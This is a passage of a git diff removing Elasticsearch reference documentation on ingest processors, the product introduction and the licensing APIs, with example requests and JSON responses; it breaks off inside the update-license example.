`roles`, `email`, `full_name`, -`metadata`, `api_key`, `realm` and `authentication_type`) from the current -authenticated user to the current document by pre-processing the ingest. -The `api_key` property exists only if the user authenticates with an -API key. It is an object containing the `id` and `name` fields of the API key. -The `realm` property is also an object with two fields, `name` and `type`. -When using API key authentication, the `realm` property refers to the realm -from which the API key is created. -The `authentication_type` property is a string that can take value from -`REALM`, `API_KEY`, `TOKEN` and `ANONYMOUS`. - -IMPORTANT: Requires an authenticated user for the index request. - -[[set-security-user-options]] -.Set Security User Options -[options="header"] -|====== -| Name | Required | Default | Description -| `field` | yes | - | The field to store the user information into. -| `properties` | no | [`username`, `roles`, `email`, `full_name`, `metadata`, `api_key`, `realm`, `authentication_type`] | Controls what user related properties are added to the `field`. -include::common-options.asciidoc[] -|====== - -The following example adds all user details for the current authenticated user -to the `user` field for all documents that are processed by this pipeline: - -[source,js] --------------------------------------------------- -{ - "processors" : [ - { - "set_security_user": { - "field": "user" - } - } - ] -} --------------------------------------------------- -// NOTCONSOLE diff --git a/docs/reference/ingest/processors/set.asciidoc b/docs/reference/ingest/processors/set.asciidoc deleted file mode 100644 index e445bfaf229..00000000000 --- a/docs/reference/ingest/processors/set.asciidoc +++ /dev/null @@ -1,90 +0,0 @@ -[[set-processor]] -=== Set processor -++++ -Set -++++ - -Sets one field and associates it with the specified value. If the field already exists, -its value will be replaced with the provided one. - -[[set-options]] -.Set Options -[options="header"] -|====== -| Name | Required | Default | Description -| `field` | yes | - | The field to insert, upsert, or update. Supports <>. -| `value` | yes | - | The value to be set for the field. Supports <>. -| `override` | no | true | If processor will update fields with pre-existing non-null-valued field. When set to `false`, such fields will not be touched. -| `ignore_empty_value` | no | `false` | If `true` and `value` is a <> that evaluates to `null` or the empty string, the processor quietly exits without modifying the document -include::common-options.asciidoc[] -|====== - -[source,js] --------------------------------------------------- -{ - "description" : "sets the value of count to 1" - "set": { - "field": "count", - "value": 1 - } -} --------------------------------------------------- -// NOTCONSOLE - -This processor can also be used to copy data from one field to another. For example: - -[source,console] --------------------------------------------------- -PUT _ingest/pipeline/set_os -{ - "description": "sets the value of host.os.name from the field os", - "processors": [ - { - "set": { - "field": "host.os.name", - "value": "{{os}}" - } - } - ] -} - -POST _ingest/pipeline/set_os/_simulate -{ - "docs": [ - { - "_source": { - "os": "Ubuntu" - } - } - ] -} --------------------------------------------------- - -Result: - -[source,console-result] --------------------------------------------------- -{ - "docs" : [ - { - "doc" : { - "_index" : "_index", - "_type" : "_doc", - "_id" : "_id", - "_source" : { - "host" : { - "os" : { - "name" : "Ubuntu" - } - }, - "os" : "Ubuntu" - }, - "_ingest" : { - "timestamp" : "2019-03-11T21:54:37.909224Z" - } - } - } - ] -} --------------------------------------------------- -// TESTRESPONSE[s/2019-03-11T21:54:37.909224Z/$body.docs.0.doc._ingest.timestamp/] diff --git a/docs/reference/ingest/processors/sort.asciidoc b/docs/reference/ingest/processors/sort.asciidoc deleted file mode 100644 index 81999d2d903..00000000000 --- a/docs/reference/ingest/processors/sort.asciidoc +++ /dev/null @@ -1,31 +0,0 @@ -[[sort-processor]] -=== Sort processor -++++ -Sort -++++ - -Sorts the elements of an array ascending or descending. Homogeneous arrays of numbers will be sorted -numerically, while arrays of strings or heterogeneous arrays of strings + numbers will be sorted lexicographically. -Throws an error when the field is not an array. - -[[sort-options]] -.Sort Options -[options="header"] -|====== -| Name | Required | Default | Description -| `field` | yes | - | The field to be sorted -| `order` | no | `"asc"` | The sort order to use. Accepts `"asc"` or `"desc"`. -| `target_field` | no | `field` | The field to assign the sorted value to, by default `field` is updated in-place -include::common-options.asciidoc[] -|====== - -[source,js] --------------------------------------------------- -{ - "sort": { - "field": "array_field_to_sort", - "order": "desc" - } -} --------------------------------------------------- -// NOTCONSOLE diff --git a/docs/reference/ingest/processors/split.asciidoc b/docs/reference/ingest/processors/split.asciidoc deleted file mode 100644 index 39e73b589f7..00000000000 --- a/docs/reference/ingest/processors/split.asciidoc +++ /dev/null @@ -1,49 +0,0 @@ -[[split-processor]] -=== Split processor -++++ -Split -++++ - -Splits a field into an array using a separator character. Only works on string fields. - -[[split-options]] -.Split Options -[options="header"] -|====== -| Name | Required | Default | Description -| `field` | yes | - | The field to split -| `separator` | yes | - | A regex which matches the separator, eg `,` or `\s+` -| `target_field` | no | `field` | The field to assign the split value to, by default `field` is updated in-place -| `ignore_missing` | no | `false` | If `true` and `field` does not exist, the processor quietly exits without modifying the document -| `preserve_trailing`| no | `false` | Preserves empty trailing fields, if any. -include::common-options.asciidoc[] -|====== - -[source,js] --------------------------------------------------- -{ - "split": { - "field": "my_field", - "separator": "\\s+" <1> - } -} --------------------------------------------------- -// NOTCONSOLE -<1> Treat all consecutive whitespace characters as a single separator - -If the `preserve_trailing` option is enabled, any trailing empty fields in the input will be preserved. For example, -in the configuration below, a value of `A,,B,,` in the `my_field` property will be split into an array of five elements -`["A", "", "B", "", ""]` with two empty trailing fields. If the `preserve_trailing` property were not enabled, the two -empty trailing fields would be discarded resulting in the three-element array `["A", "", "B"]`. - -[source,js] --------------------------------------------------- -{ - "split": { - "field": "my_field", - "separator": ",", - "preserve_trailing": true - } -} --------------------------------------------------- -// NOTCONSOLE diff --git a/docs/reference/ingest/processors/trim.asciidoc b/docs/reference/ingest/processors/trim.asciidoc deleted file mode 100644 index 5b7c80ea803..00000000000 --- a/docs/reference/ingest/processors/trim.asciidoc +++ /dev/null @@ -1,30 +0,0 @@ -[[trim-processor]] -=== Trim processor -++++ -Trim -++++ - -Trims whitespace from field. If the field is an array of strings, all members of the array will be trimmed. - -NOTE: This only works on leading and trailing whitespace. - -[[trim-options]] -.Trim Options -[options="header"] -|====== -| Name | Required | Default | Description -| `field` | yes | - | The string-valued field to trim whitespace from -| `target_field` | no | `field` | The field to assign the trimmed value to, by default `field` is updated in-place -| `ignore_missing` | no | `false` | If `true` and `field` does not exist, the processor quietly exits without modifying the document -include::common-options.asciidoc[] -|====== - -[source,js] --------------------------------------------------- -{ - "trim": { - "field": "foo" - } -} --------------------------------------------------- -// NOTCONSOLE diff --git a/docs/reference/ingest/processors/uppercase.asciidoc b/docs/reference/ingest/processors/uppercase.asciidoc deleted file mode 100644 index 6d334373d9c..00000000000 --- a/docs/reference/ingest/processors/uppercase.asciidoc +++ /dev/null @@ -1,28 +0,0 @@ -[[uppercase-processor]] -=== Uppercase processor -++++ -Uppercase -++++ - -Converts a string to its uppercase equivalent. If the field is an array of strings, all members of the array will be converted. - -[[uppercase-options]] -.Uppercase Options -[options="header"] -|====== -| Name | Required | Default | Description -| `field` | yes | - | The field to make uppercase -| `target_field` | no | `field` | The field to assign the converted value to, by default `field` is updated in-place -| `ignore_missing` | no | `false` | If `true` and `field` does not exist or is `null`, the processor quietly exits without modifying the document -include::common-options.asciidoc[] -|====== - -[source,js] --------------------------------------------------- -{ - "uppercase": { - "field": "foo" - } -} --------------------------------------------------- -// NOTCONSOLE diff --git a/docs/reference/ingest/processors/url-decode.asciidoc b/docs/reference/ingest/processors/url-decode.asciidoc deleted file mode 100644 index 5810fff90b0..00000000000 --- a/docs/reference/ingest/processors/url-decode.asciidoc +++ /dev/null @@ -1,28 +0,0 @@ -[[urldecode-processor]] -=== URL decode processor -++++ -URL decode -++++ - -URL-decodes a string. If the field is an array of strings, all members of the array will be decoded. - -[[urldecode-options]] -.URL Decode Options -[options="header"] -|====== -| Name | Required | Default | Description -| `field` | yes | - | The field to decode -| `target_field` | no | `field` | The field to assign the converted value to, by default `field` is updated in-place -| `ignore_missing` | no | `false` | If `true` and `field` does not exist or is `null`, the processor quietly exits without modifying the document -include::common-options.asciidoc[] -|====== - -[source,js] --------------------------------------------------- -{ - "urldecode": { - "field": "my_url_to_decode" - } -} --------------------------------------------------- -// NOTCONSOLE diff --git a/docs/reference/ingest/processors/user-agent.asciidoc b/docs/reference/ingest/processors/user-agent.asciidoc deleted file mode 100644 index 073a02fef38..00000000000 --- a/docs/reference/ingest/processors/user-agent.asciidoc +++ /dev/null @@ -1,101 +0,0 @@ -[[user-agent-processor]] -=== User agent processor -++++ -User agent -++++ - -The `user_agent` processor extracts details from the user agent string a browser sends with its web requests. -This processor adds this information by default under the `user_agent` field. - -The ingest-user-agent module ships by default with the regexes.yaml made available by uap-java with an Apache 2.0 license. For more details see https://github.com/ua-parser/uap-core. - -[[using-ingest-user-agent]] -==== Using the user_agent Processor in a Pipeline - -[[ingest-user-agent-options]] -.User-agent options -[options="header"] -|====== -| Name | Required | Default | Description -| `field` | yes | - | The field containing the user agent string. -| `target_field` | no | user_agent | The field that will be filled with the user agent details. -| `regex_file` | no | - | The name of the file in the `config/ingest-user-agent` directory containing the regular expressions for parsing the user agent string. Both the directory and the file have to be created before starting Elasticsearch. If not specified, ingest-user-agent will use the regexes.yaml from uap-core it ships with (see below). -| `properties` | no | [`name`, `major`, `minor`, `patch`, `build`, `os`, `os_name`, `os_major`, `os_minor`, `device`] | Controls what properties are added to `target_field`. -| `ignore_missing` | no | `false` | If `true` and `field` does not exist, the processor quietly exits without modifying the document -| `ecs` | no | `true` | Whether to return the output in Elastic Common Schema format. NOTE: This setting is deprecated and will be removed in a future version. -|====== - -Here is an example that adds the user agent details to the `user_agent` field based on the `agent` field: - -[source,console] --------------------------------------------------- -PUT _ingest/pipeline/user_agent -{ - "description" : "Add user agent information", - "processors" : [ - { - "user_agent" : { - "field" : "agent" - } - } - ] -} -PUT my-index-000001/_doc/my_id?pipeline=user_agent -{ - "agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" -} -GET my-index-000001/_doc/my_id --------------------------------------------------- - -Which returns - -[source,console-result] --------------------------------------------------- -{ - "found": true, - "_index": "my-index-000001", - "_type": "_doc", - "_id": "my_id", - "_version": 1, - "_seq_no": 22, - "_primary_term": 1, - "_source": { - "agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36", - "user_agent": { - "name": "Chrome", - "original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36", - "version": "51.0.2704.103", - "os": { - "name": "Mac OS X", - "version": "10.10.5", - "full": "Mac OS X 10.10.5" - }, - "device" : { - "name" : "Mac" - }, - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"_seq_no": \d+/"_seq_no" : $body._seq_no/ s/"_primary_term": 1/"_primary_term" : $body._primary_term/] - -===== Using a custom regex file -To use a custom regex file for parsing the user agents, that file has to be put into the `config/ingest-user-agent` directory and -has to have a `.yml` filename extension. The file has to be present at node startup, any changes to it or any new files added -while the node is running will not have any effect. - -In practice, it will make most sense for any custom regex file to be a variant of the default file, either a more recent version -or a customised version. - -The default file included in `ingest-user-agent` is the `regexes.yaml` from uap-core: https://github.com/ua-parser/uap-core/blob/master/regexes.yaml - -[[ingest-user-agent-settings]] -===== Node Settings - -The `user_agent` processor supports the following setting: - -`ingest.user_agent.cache_size`:: - - The maximum number of results that should be cached. Defaults to `1000`. - -Note that these settings are node settings and apply to all `user_agent` processors, i.e. there is one cache for all defined `user_agent` processors. diff --git a/docs/reference/intro.asciidoc b/docs/reference/intro.asciidoc deleted file mode 100644 index 00f3cb9c695..00000000000 --- a/docs/reference/intro.asciidoc +++ /dev/null @@ -1,266 +0,0 @@ -[[elasticsearch-intro]] -== What is {es}? -_**You know, for search (and analysis)**_ - -{es} is the distributed search and analytics engine at the heart of -the {stack}. {ls} and {beats} facilitate collecting, aggregating, and -enriching your data and storing it in {es}. {kib} enables you to -interactively explore, visualize, and share insights into your data and manage -and monitor the stack. {es} is where the indexing, search, and analysis -magic happens. - -{es} provides near real-time search and analytics for all types of data. Whether you -have structured or unstructured text, numerical data, or geospatial data, -{es} can efficiently store and index it in a way that supports fast searches. -You can go far beyond simple data retrieval and aggregate information to discover -trends and patterns in your data. And as your data and query volume grows, the -distributed nature of {es} enables your deployment to grow seamlessly right -along with it. - -While not _every_ problem is a search problem, {es} offers speed and flexibility -to handle data in a wide variety of use cases: - -* Add a search box to an app or website -* Store and analyze logs, metrics, and security event data -* Use machine learning to automatically model the behavior of your data in real - time -* Automate business workflows using {es} as a storage engine -* Manage, integrate, and analyze spatial information using {es} as a geographic - information system (GIS) -* Store and process genetic data using {es} as a bioinformatics research tool - -We’re continually amazed by the novel ways people use search. But whether -your use case is similar to one of these, or you're using {es} to tackle a new -problem, the way you work with your data, documents, and indices in {es} is -the same. - -[[documents-indices]] -=== Data in: documents and indices - -{es} is a distributed document store. Instead of storing information as rows of -columnar data, {es} stores complex data structures that have been serialized -as JSON documents. When you have multiple {es} nodes in a cluster, stored -documents are distributed across the cluster and can be accessed immediately -from any node. - -When a document is stored, it is indexed and fully searchable in <>--within 1 second. {es} uses a data structure called an -inverted index that supports very fast full-text searches. An inverted index -lists every unique word that appears in any document and identifies all of the -documents each word occurs in. - -An index can be thought of as an optimized collection of documents and each -document is a collection of fields, which are the key-value pairs that contain -your data. By default, {es} indexes all data in every field and each indexed -field has a dedicated, optimized data structure. For example, text fields are -stored in inverted indices, and numeric and geo fields are stored in BKD trees. -The ability to use the per-field data structures to assemble and return search -results is what makes {es} so fast. - -{es} also has the ability to be schema-less, which means that documents can be -indexed without explicitly specifying how to handle each of the different fields -that might occur in a document. When dynamic mapping is enabled, {es} -automatically detects and adds new fields to the index. This default -behavior makes it easy to index and explore your data--just start -indexing documents and {es} will detect and map booleans, floating point and -integer values, dates, and strings to the appropriate {es} data types. - -Ultimately, however, you know more about your data and how you want to use it -than {es} can. You can define rules to control dynamic mapping and explicitly -define mappings to take full control of how fields are stored and indexed. - -Defining your own mappings enables you to: - -* Distinguish between full-text string fields and exact value string fields -* Perform language-specific text analysis -* Optimize fields for partial matching -* Use custom date formats -* Use data types such as `geo_point` and `geo_shape` that cannot be automatically -detected - -It’s often useful to index the same field in different ways for different -purposes. For example, you might want to index a string field as both a text -field for full-text search and as a keyword field for sorting or aggregating -your data. Or, you might choose to use more than one language analyzer to -process the contents of a string field that contains user input. - -The analysis chain that is applied to a full-text field during indexing is also -used at search time. When you query a full-text field, the query text undergoes -the same analysis before the terms are looked up in the index. - -[[search-analyze]] -=== Information out: search and analyze - -While you can use {es} as a document store and retrieve documents and their -metadata, the real power comes from being able to easily access the full suite -of search capabilities built on the Apache Lucene search engine library. - -{es} provides a simple, coherent REST API for managing your cluster and indexing -and searching your data. For testing purposes, you can easily submit requests -directly from the command line or through the Developer Console in {kib}. From -your applications, you can use the -https://www.elastic.co/guide/en/elasticsearch/client/index.html[{es} client] -for your language of choice: Java, JavaScript, Go, .NET, PHP, Perl, Python -or Ruby. - -[discrete] -[[search-data]] -==== Searching your data - -The {es} REST APIs support structured queries, full text queries, and complex -queries that combine the two. Structured queries are -similar to the types of queries you can construct in SQL. For example, you -could search the `gender` and `age` fields in your `employee` index and sort the -matches by the `hire_date` field. Full-text queries find all documents that -match the query string and return them sorted by _relevance_—how good a -match they are for your search terms. - -In addition to searching for individual terms, you can perform phrase searches, -similarity searches, and prefix searches, and get autocomplete suggestions. - -Have geospatial or other numerical data that you want to search? {es} indexes -non-textual data in optimized data structures that support -high-performance geo and numerical queries. - -You can access all of these search capabilities using {es}'s -comprehensive JSON-style query language (<>). You can also -construct <> to search and aggregate data -natively inside {es}, and JDBC and ODBC drivers enable a broad range of -third-party applications to interact with {es} via SQL. - -[discrete] -[[analyze-data]] -==== Analyzing your data - -{es} aggregations enable you to build complex summaries of your data and gain -insight into key metrics, patterns, and trends. Instead of just finding the -proverbial “needle in a haystack”, aggregations enable you to answer questions -like: - -* How many needles are in the haystack? -* What is the average length of the needles? -* What is the median length of the needles, broken down by manufacturer? -* How many needles were added to the haystack in each of the last six months? - -You can also use aggregations to answer more subtle questions, such as: - -* What are your most popular needle manufacturers? -* Are there any unusual or anomalous clumps of needles? - -Because aggregations leverage the same data-structures used for search, they are -also very fast. This enables you to analyze and visualize your data in real time. -Your reports and dashboards update as your data changes so you can take action -based on the latest information. - -What’s more, aggregations operate alongside search requests. You can search -documents, filter results, and perform analytics at the same time, on the same -data, in a single request. And because aggregations are calculated in the -context of a particular search, you’re not just displaying a count of all -size 70 needles, you’re displaying a count of the size 70 needles -that match your users' search criteria--for example, all size 70 _non-stick -embroidery_ needles. - -[discrete] -[[more-features]] -===== But wait, there’s more - -Want to automate the analysis of your time series data? You can use -{ml-docs}/ml-overview.html[machine learning] features to create accurate -baselines of normal behavior in your data and identify anomalous patterns. With -machine learning, you can detect: - -* Anomalies related to temporal deviations in values, counts, or frequencies -* Statistical rarity -* Unusual behaviors for a member of a population - -And the best part? You can do this without having to specify algorithms, models, -or other data science-related configurations. - -[[scalability]] -=== Scalability and resilience: clusters, nodes, and shards -++++ -Scalability and resilience -++++ - -{es} is built to be always available and to scale with your needs. It does this -by being distributed by nature. You can add servers (nodes) to a cluster to -increase capacity and {es} automatically distributes your data and query load -across all of the available nodes. No need to overhaul your application, {es} -knows how to balance multi-node clusters to provide scale and high availability. -The more nodes, the merrier. - -How does this work? Under the covers, an {es} index is really just a logical -grouping of one or more physical shards, where each shard is actually a -self-contained index. By distributing the documents in an index across multiple -shards, and distributing those shards across multiple nodes, {es} can ensure -redundancy, which both protects against hardware failures and increases -query capacity as nodes are added to a cluster. As the cluster grows (or shrinks), -{es} automatically migrates shards to rebalance the cluster. - -There are two types of shards: primaries and replicas. Each document in an index -belongs to one primary shard. A replica shard is a copy of a primary shard. -Replicas provide redundant copies of your data to protect against hardware -failure and increase capacity to serve read requests -like searching or retrieving a document. - -The number of primary shards in an index is fixed at the time that an index is -created, but the number of replica shards can be changed at any time, without -interrupting indexing or query operations. - -[discrete] -[[it-depends]] -==== It depends... - -There are a number of performance considerations and trade offs with respect -to shard size and the number of primary shards configured for an index. The more -shards, the more overhead there is simply in maintaining those indices. The -larger the shard size, the longer it takes to move shards around when {es} -needs to rebalance a cluster. - -Querying lots of small shards makes the processing per shard faster, but more -queries means more overhead, so querying a smaller -number of larger shards might be faster. In short...it depends. - -As a starting point: - -* Aim to keep the average shard size between a few GB and a few tens of GB. For - use cases with time-based data, it is common to see shards in the 20GB to 40GB - range. - -* Avoid the gazillion shards problem. The number of shards a node can hold is - proportional to the available heap space. As a general rule, the number of - shards per GB of heap space should be less than 20. - -The best way to determine the optimal configuration for your use case is -through https://www.elastic.co/elasticon/conf/2016/sf/quantitative-cluster-sizing[ -testing with your own data and queries]. - -[discrete] -[[disaster-ccr]] -==== In case of disaster - -For performance reasons, the nodes within a cluster need to be on the same -network. Balancing shards in a cluster across nodes in different data centers -simply takes too long. But high-availability architectures demand that you avoid -putting all of your eggs in one basket. In the event of a major outage in one -location, servers in another location need to be able to take over. Seamlessly. -The answer? {ccr-cap} (CCR). - -CCR provides a way to automatically synchronize indices from your primary cluster -to a secondary remote cluster that can serve as a hot backup. If the primary -cluster fails, the secondary cluster can take over. You can also use CCR to -create secondary clusters to serve read requests in geo-proximity to your users. - -{ccr-cap} is active-passive. The index on the primary cluster is -the active leader index and handles all write requests. Indices replicated to -secondary clusters are read-only followers. - -[discrete] -[[admin]] -==== Care and feeding - -As with any enterprise system, you need tools to secure, manage, and -monitor your {es} clusters. Security, monitoring, and administrative features -that are integrated into {es} enable you to use {kibana-ref}/introduction.html[{kib}] -as a control center for managing a cluster. Features like <> and <> -help you intelligently manage your data over time. diff --git a/docs/reference/licensing/delete-license.asciidoc b/docs/reference/licensing/delete-license.asciidoc deleted file mode 100644 index 04c095110cc..00000000000 --- a/docs/reference/licensing/delete-license.asciidoc +++ /dev/null @@ -1,48 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[delete-license]] -=== Delete license API -++++ -Delete license -++++ - -This API enables you to delete licensing information. - -[discrete] -==== Request - -`DELETE /_license` - -[discrete] -==== Description - -When your license expires, {xpack} operates in a degraded mode. For more -information, see -{kibana-ref}/managing-licenses.html#license-expiration[License expiration]. - -[discrete] -==== Authorization - -You must have `manage` cluster privileges to use this API. -For more information, see -<>. - -[discrete] -==== Examples - -The following example queries the info API: - -[source,console] ------------------------------------------------------------- -DELETE /_license ------------------------------------------------------------- -// TEST[skip:license testing issues] - -When the license is successfully deleted, the API returns the following response: -[source,js] ------------------------------------------------------------- -{ - "acknowledged": true -} ------------------------------------------------------------- -// NOTCONSOLE \ No newline at end of file diff --git a/docs/reference/licensing/get-basic-status.asciidoc b/docs/reference/licensing/get-basic-status.asciidoc deleted file mode 100644 index ea5e3466845..00000000000 --- a/docs/reference/licensing/get-basic-status.asciidoc +++ /dev/null @@ -1,48 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[get-basic-status]] -=== Get basic status API -++++ -Get basic status -++++ - -This API enables you to check the status of your basic license. - -[discrete] -==== Request - -`GET /_license/basic_status` - -[discrete] -==== Description - -In order to initiate a basic license, you must not currently have a basic -license. - -For more information about the different types of licenses, see -https://www.elastic.co/subscriptions. - -==== Authorization - -You must have `monitor` cluster privileges to use this API. -For more information, see <>. - -[discrete] -==== Examples - -The following example checks whether you are eligible to start a basic: - -[source,console] ------------------------------------------------------------- -GET /_license/basic_status ------------------------------------------------------------- - -Example response: - -[source,console-result] ------------------------------------------------------------- -{ - "eligible_to_start_basic": true -} ------------------------------------------------------------- -// TESTRESPONSE[s/"eligible_to_start_basic": true/"eligible_to_start_basic": $body.eligible_to_start_basic/] diff --git a/docs/reference/licensing/get-license.asciidoc b/docs/reference/licensing/get-license.asciidoc deleted file mode 100644 index 527d6ef54ca..00000000000 --- a/docs/reference/licensing/get-license.asciidoc +++ /dev/null @@ -1,77 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[get-license]] -=== Get license API -++++ -Get license -++++ - -This API enables you to retrieve licensing information. - -[discrete] -==== Request - -`GET /_license` - -[discrete] -==== Description - -This API returns information about the type of license, when it was issued, and -when it expires, for example. - -For more information about the different types of licenses, see -https://www.elastic.co/subscriptions. - - -[discrete] -==== Query Parameters - -`local`:: - (Boolean) Specifies whether to retrieve local information. The default value - is `false`, which means the information is retrieved from the master node. - - -[discrete] -==== Authorization - -You must have `monitor` cluster privileges to use this API. -For more information, see <>. - - -[discrete] -==== Examples - -The following example provides information about a trial license: - -[source,console] --------------------------------------------------- -GET /_license --------------------------------------------------- - -[source,console-result] --------------------------------------------------- -{ - "license" : { - "status" : "active", - "uid" : "cbff45e7-c553-41f7-ae4f-9205eabd80xx", - "type" : "trial", - "issue_date" : "2018-10-20T22:05:12.332Z", - "issue_date_in_millis" : 1540073112332, - "expiry_date" : "2018-11-19T22:05:12.332Z", - "expiry_date_in_millis" : 1542665112332, - "max_nodes" : 1000, - "issued_to" : "test", - "issuer" : "elasticsearch", - "start_date_in_millis" : -1 - } -} --------------------------------------------------- -// TESTRESPONSE[s/"cbff45e7-c553-41f7-ae4f-9205eabd80xx"/$body.license.uid/] -// TESTRESPONSE[s/"basic"/$body.license.type/] -// TESTRESPONSE[s/"2018-10-20T22:05:12.332Z"/$body.license.issue_date/] -// TESTRESPONSE[s/1540073112332/$body.license.issue_date_in_millis/] -// TESTRESPONSE[s/"2018-11-19T22:05:12.332Z"/$body.license.expiry_date/] -// TESTRESPONSE[s/1542665112332/$body.license.expiry_date_in_millis/] -// TESTRESPONSE[s/1000/$body.license.max_nodes/] -// TESTRESPONSE[s/"test"/$body.license.issued_to/] -// TESTRESPONSE[s/"elasticsearch"/$body.license.issuer/] diff --git a/docs/reference/licensing/get-trial-status.asciidoc b/docs/reference/licensing/get-trial-status.asciidoc deleted file mode 100644 index d68365762bb..00000000000 --- a/docs/reference/licensing/get-trial-status.asciidoc +++ /dev/null @@ -1,53 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[get-trial-status]] -=== Get trial status API -++++ -Get trial status -++++ - -Enables you to check the status of your trial. - -[discrete] -==== Request - -`GET /_license/trial_status` - -[discrete] -==== Description - -If you want to try all the subscription features, you can start a 30-day trial. - -NOTE: You are allowed to initiate a trial only if your cluster has not -already activated a trial for the current major product version. For example, if -you have already activated a trial for v6.0, you cannot start a new trial until -v7.0. You can, however, request an extended trial at {extendtrial}. - -For more information about features and subscriptions, see -https://www.elastic.co/subscriptions. - -==== Authorization - -You must have `monitor` cluster privileges to use this API. -For more information, see -<>. - -[discrete] -==== Examples - -The following example checks whether you are eligible to start a trial: - -[source,console] ------------------------------------------------------------- -GET /_license/trial_status ------------------------------------------------------------- - -Example response: - -[source,console-result] ------------------------------------------------------------- -{ - "eligible_to_start_trial": true -} ------------------------------------------------------------- -// TESTRESPONSE[s/"eligible_to_start_trial": true/"eligible_to_start_trial": $body.eligible_to_start_trial/] diff --git a/docs/reference/licensing/index.asciidoc b/docs/reference/licensing/index.asciidoc deleted file mode 100644 index a1dfd398acf..00000000000 --- a/docs/reference/licensing/index.asciidoc +++ /dev/null @@ -1,22 +0,0 @@ -[role="xpack"] -[[licensing-apis]] -== Licensing APIs - -You can use the following APIs to manage your licenses: - -* <> -* <> -* <> -* <> -* <> -* <> -* <> - - -include::delete-license.asciidoc[] -include::get-license.asciidoc[] -include::get-trial-status.asciidoc[] -include::start-trial.asciidoc[] -include::get-basic-status.asciidoc[] -include::start-basic.asciidoc[] -include::update-license.asciidoc[] diff --git a/docs/reference/licensing/start-basic.asciidoc b/docs/reference/licensing/start-basic.asciidoc deleted file mode 100644 index 199e917a292..00000000000 --- a/docs/reference/licensing/start-basic.asciidoc +++ /dev/null @@ -1,76 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[start-basic]] -=== Start basic API -++++ -Start basic -++++ - -This API starts an indefinite basic license. - -[discrete] -==== Request - -`POST /_license/start_basic` - -[discrete] -==== Description - -The `start basic` API enables you to initiate an indefinite basic license, which -gives access to all the basic features. If the basic license does not support -all of the features that are available with your current license, however, you are -notified in the response. You must then re-submit the API request with the -`acknowledge` parameter set to `true`. - -To check the status of your basic license, use the following API: -<>. - -For more information about the different types of licenses, see -https://www.elastic.co/subscriptions. - -==== Authorization - -You must have `manage` cluster privileges to use this API. -For more information, see -<>. - -[discrete] -==== Examples - -The following example starts a basic license if you do not currently have a license: - -[source,console] ------------------------------------------------------------- -POST /_license/start_basic ------------------------------------------------------------- -// TEST[skip:license testing issues] - -Example response: -[source,js] ------------------------------------------------------------- -{ - "basic_was_started": true, - "acknowledged": true -} ------------------------------------------------------------- -// NOTCONSOLE - -The following example starts a basic license if you currently have a license with more -features than a basic license. As you are losing features, you must pass the acknowledge -parameter: - -[source,console] ------------------------------------------------------------- -POST /_license/start_basic?acknowledge=true ------------------------------------------------------------- -// TEST[skip:license testing issues] - -Example response: -[source,js] ------------------------------------------------------------- -{ - "basic_was_started": true, - "acknowledged": true -} ------------------------------------------------------------- -// NOTCONSOLE \ No newline at end of file diff --git a/docs/reference/licensing/start-trial.asciidoc b/docs/reference/licensing/start-trial.asciidoc deleted file mode 100644 index ef3bd93410b..00000000000 --- a/docs/reference/licensing/start-trial.asciidoc +++ /dev/null @@ -1,58 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[start-trial]] -=== Start trial API -++++ -Start trial -++++ - -Starts a 30-day trial. - -[discrete] -==== Request - -`POST /_license/start_trial` - -[discrete] -==== Description - -The `start trial` API enables you to start a 30-day trial, which gives access to -all subscription features. - -NOTE: You are allowed to initiate a trial only if your cluster has not already -activated a trial for the current major product version. For example, if you -have already activated a trial for v6.0, you cannot start a new trial until v7.0. -You can, however, request an extended trial at {extendtrial}. - -To check the status of your trial, use <>. - -For more information about features and subscriptions, see -https://www.elastic.co/subscriptions. - -==== Authorization - -You must have `manage` cluster privileges to use this API. -For more information, see -<>. - -[discrete] -==== Examples - -The following example starts a 30-day trial. The acknowledge parameter is -required as you are initiating a license that will expire. - -[source,console] ------------------------------------------------------------- -POST /_license/start_trial?acknowledge=true ------------------------------------------------------------- -// TEST[skip:license testing issues] - -Example response: -[source,js] ------------------------------------------------------------- -{ - "trial_was_started": true, - "acknowledged": true -} ------------------------------------------------------------- -// NOTCONSOLE \ No newline at end of file diff --git a/docs/reference/licensing/update-license.asciidoc b/docs/reference/licensing/update-license.asciidoc deleted file mode 100644 index 823f564331d..00000000000 --- a/docs/reference/licensing/update-license.asciidoc +++ /dev/null @@ -1,166 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[update-license]] -=== Update license API -++++ -Update license -++++ - -Updates the license for your {es} cluster. - -[[update-license-api-request]] -==== {api-request-title} - -`PUT _license` - -`POST _license` - -[[update-license-api-prereqs]] -==== {api-prereq-title} - -If {es} {security-features} are enabled, you need `manage` cluster privileges to -install the license. - -If {es} {security-features} are enabled and you are installing a gold or higher -license, you must enable TLS on the transport networking layer before you -install the license. See <>. - -[[update-license-api-desc]] -==== {api-description-title} - -You can update your license at runtime without shutting down your nodes. License -updates take effect immediately. If the license you are installing does not -support all of the features that were available with your previous license, -however, you are notified in the response. You must then re-submit the API -request with the `acknowledge` parameter set to `true`. - -For more information about the different types of licenses, see -https://www.elastic.co/subscriptions. - -[[update-license-api-query-params]] -==== {api-query-parms-title} - -`acknowledge`:: - (Optional, Boolean) - Specifies whether you acknowledge the license changes. The default - value is `false`. - -[[update-license-api-request-body]] -==== {api-request-body-title} - -`licenses`:: - (Required, array) - A sequence of one or more JSON documents containing the license information. - -[[update-license-api-example]] -==== {api-examples-title} - -The following example updates to a basic license: - -[source,console] ------------------------------------------------------------- -PUT _license -{ - "licenses": [ - { - "uid":"893361dc-9749-4997-93cb-802e3d7fa4xx", - "type":"basic", - "issue_date_in_millis":1411948800000, - "expiry_date_in_millis":1914278399999, - "max_nodes":1, - "issued_to":"issuedTo", - "issuer":"issuer", - "signature":"xx" - } - 